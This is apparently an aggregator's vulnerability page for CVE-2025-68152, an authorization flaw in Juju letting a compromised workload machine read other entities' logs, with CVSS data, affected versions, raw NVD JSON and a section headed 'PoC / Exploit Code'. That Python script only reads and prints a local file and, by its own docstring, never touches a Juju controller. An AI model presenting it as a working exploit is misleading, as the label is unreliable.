Security Vulnerability Report
CVE-2025-68152 CVSS 4.9 MEDIUM

CVE-2025-68152

Published: 2026-04-03 16:16:23
Last Modified: 2026-04-21 01:18:40

Description

Juju is an open source application orchestration engine that enables any application operation on any infrastructure at any scale through special operators called ‘charms’. From versions 2.9 to before 2.9.56 and 3.6 to before 3.6.19, it is possible that a compromised workload machine under a Juju controller can read any log file for any entity in any model at any level. This issue has been patched in versions 2.9.56 and 3.6.19.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* - VULNERABLE
Juju 2.9.x < 2.9.56
Juju 3.6.x < 3.6.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
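#!/usr/bin/env python3
"""Read one log file from the local filesystem and print it.

Companion listing for CVE-2025-68152 (Juju, CWE-863 incorrect
authorization; fixed in 2.9.56 and 3.6.19). This script only opens a
path on the machine it runs on via ``open()``; it never contacts a Juju
controller, so it illustrates the impact the advisory describes (log
contents becoming readable) rather than exercising the controller-side
authorization flaw itself. The remediation is upgrading to a fixed
release; unexpected reads of other entities' logs are the thing to
watch for on the controller side.
"""

import os


def read_juju_logs(target_log_path):
    """Print the contents of ``target_log_path`` and return them.

    Args:
        target_log_path: Filesystem path of the log file to read.

    Returns:
        The file's text on success, or ``None`` when the file is missing,
        unreadable, or another OS-level error occurs. Nothing is raised
        for those cases; every outcome is reported on stdout.
    """
    try:
        # EAFP: opening directly removes the exists()/open() race of the
        # original check-then-act sequence. Log files are not guaranteed
        # to be valid UTF-8, so undecodable bytes are replaced instead of
        # surfacing as a UnicodeDecodeError.
        with open(target_log_path, "r", encoding="utf-8", errors="replace") as f:
            contents = f.read()
    except FileNotFoundError:
        print(f"[-] File not found: {target_log_path}")
        return None
    except PermissionError:
        print(f"[-] Permission denied: {target_log_path}")
        return None
    except OSError as e:
        # Narrowed from the original blanket ``except Exception``: only
        # I/O failures are expected here; programming errors propagate.
        print(f"[-] Error: {e}")
        return None
    print(f"[+] Contents of {target_log_path}:")
    print(contents)
    return contents


if __name__ == "__main__":
    # Placeholder location. The original listing gives
    # /var/log/juju/<model-id>/<unit-id>/log.log as an example layout;
    # this script does not establish the real layout -- confirm against
    # the deployment before relying on it.
    log_directory = "/var/log/juju/"
    print("[*] Scanning for accessible Juju logs...")
    target_path = os.path.join(log_directory, "target-model/target-unit/juju.log")
    read_juju_logs(target_path)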

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68152", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:23.193", "lastModified": "2026-04-21T01:18:39.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Juju is an open source application orchestration engine that enables any application operation on any infrastructure at any scale through special operators called ‘charms’. From versions 2.9 to before 2.9.56 and 3.6 to before 3.6.19, it is possible that a compromised workload machine under a Juju controller can read any log file for any entity in any model at any level. This issue has been patched in versions 2.9.56 and 3.6.19."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.9", "versionEndIncluding": "2.9.55", "matchCriteriaId": "E0EAA4DD-F373-4A67-B571-D3899E1E13CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6", "versionEndIncluding": "3.6.18", "matchCriteriaId": "6EDFE9C5-AB90-4FA2-84FF-C005BE2B6D6F"}]}]}], "references": [{"url": "https://github.com/juju/juju/commit/22cdcf6b54c2f371822e1c203d4f341be6c9589e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/juju/juju/commit/c91a1f4046956874ba77c8b398aecee3d61a2dc3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/juju/juju/security/advisories/GHSA-j6f6-jp3p-53mw", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}